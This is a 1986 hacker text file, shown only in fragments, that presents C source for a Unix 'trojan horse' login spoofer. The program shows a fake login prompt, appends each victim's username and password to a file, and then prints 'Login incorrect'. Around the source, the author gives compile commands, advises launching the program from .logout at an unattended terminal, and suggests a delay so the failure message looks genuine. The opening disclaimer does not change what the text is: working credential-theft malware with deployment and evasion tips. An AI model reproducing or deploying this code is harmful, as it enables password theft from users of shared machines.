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hooting Shark on 10 June 1986.  Released by Tibur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0DENTZ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I have *never* used the program below in any capacity except for testing it to see that it does indeed work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.  I do not condone the use of such a program.  I am presenting it for information purposes only.  I will not be hel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any damages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"trojan horse" program written in C for unix vers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3 (berkely unix) using the C-shell.  It might work on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such as AT&amp;T System V.  I haven't tried it.  This program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or a unix machine.  When some poor fool enters his name an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written to a file called "stuff" in your home direct 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oot has password jos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already exists, new password/login hacks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thus after you run the program several times you will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atabase of hack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'll need to configure the Hsource so that it will look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login when it is run (see below).  Then, put the sourc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orse.c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horse.c -lcurses -l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a.out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ady-to-run program will be called 'horse'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horse from a shellscript.  Create a new file and put the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'source' this file, the horse program will be invook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your terminal and watch as somebody walks up to it and un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append the above two lines to your ".logou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ever you log out, the horse program will be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ource begins here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orse.c  - Trojan Horse program.  For entertain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ten by Shooting Sh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name[10], passwor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\n\nPyramid Technology 4.2/5.0 UNIX (tiburon)\n\n\n\nlogin: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You will need to alter the above line so it prints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Each '\n' is a carriage retur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"%[^\n]"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h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Password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("%[^\n]",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ange the 'sleep(x)' above to give a delay similar to the de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ives. An instant "Login incorrect" looks supiciou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 ( fp = fopen("stuff","a") )  != -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fp,"login %s has password %s\n",name,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Login incorrec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Source ends here.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n this program's present form, if somebody hits a ^C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, they will be dumped into your shll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cked out of your school or whatever.  If you know C,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tructure to trap ^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